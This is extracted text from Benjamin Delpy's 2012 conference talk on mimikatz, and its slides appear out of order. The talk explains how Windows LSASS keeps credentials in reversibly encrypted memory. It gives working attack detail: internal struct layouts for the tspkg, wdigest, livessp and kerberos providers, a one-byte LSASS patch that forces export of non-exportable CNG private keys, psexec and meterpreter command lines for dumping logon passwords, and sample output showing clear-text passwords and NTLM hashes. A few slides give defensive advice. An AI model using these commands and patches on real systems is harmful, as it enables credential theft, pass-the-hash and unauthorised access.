ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
Who Why
Benjamin DELPY `gentilkiwi`ndash Frenchndash 26yndash Kiwi addictndash Lazy programmer
Started to code mimikatz to ndash explain security concepts ndash improve my knowledge ndash prove to Microsoft that sometimes they must change old habits
Why all in French ndash because Irsquom ndash It limits script kiddies usagendash Hack with class
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 2
mimikatzworking
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 3
sekurlsadll
mimikatzexe
KeyIsolaquo Isolation de cleacute CNG raquo
LSASSEXE
Direct action cryptopatchcng
EventLoglaquo Journal drsquoeacuteveacutenements Windows raquo
SVCHOSTEXE
Direct action diverseventdrop
mimikatzexe
SamSSlaquo Gestionnaire de comptes de seacutecuriteacute raquo
LSASSEXE
VirtualAllocEx WriteProcessMemory CreateRemoteThread
Open a pipeWrite a welcome messageWait commandshellip and return results
mimikatzarchitecture of sekurlsa amp crypto
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 4
mimikatzexe
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo
mod_mimikatz_divers
mod_mimikatz_winmine
mod_mimikatz_impersonate
mod_mimikatz_inject
mod_mimikatz_samdump
mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle
mod_mimikatz_system
mod_mimikatz_service
mod_mimikatz_process
mod_mimikatz_thread
mod_mimikatz_terminalserver
mod_mimikatz_privilege
mod_pipe
mod_inject
mod_memory
mod_parseur
mod_patch
mod_hive
mod_secacl
mod_privilege
mod_process
mod_service
mod_system
mod_thread
mod_ts
mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0
tspkg
wdigest
livessp
kerberos
kappfreedll
kelloworlddll
klockdll
mimikatzsys
sekurlsadll
sam
secrets
msv_1_0
wdigest
livessp
kerberos
tspkg
mimikatz sekurlsawhat is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5
mod_mimikatz_sekurlsa
mimikatz sekurlsahow LSA works ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6
LsaSSWinLogon
AuthenticationPackagesmsv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
ChallengeResponse
userdomainpassword
PLAYSKOOL
mimikatz sekurlsahow LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7
PLAYSKOOL
mimikatz sekurlsahistory of laquo pass-the- raquo 12
Pass-the-hashndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo HernanOchoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticketndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8
mimikatz sekurlsahistory of laquo pass-the- raquo 22
Pass-the-passndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memorybull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe)bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9
mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
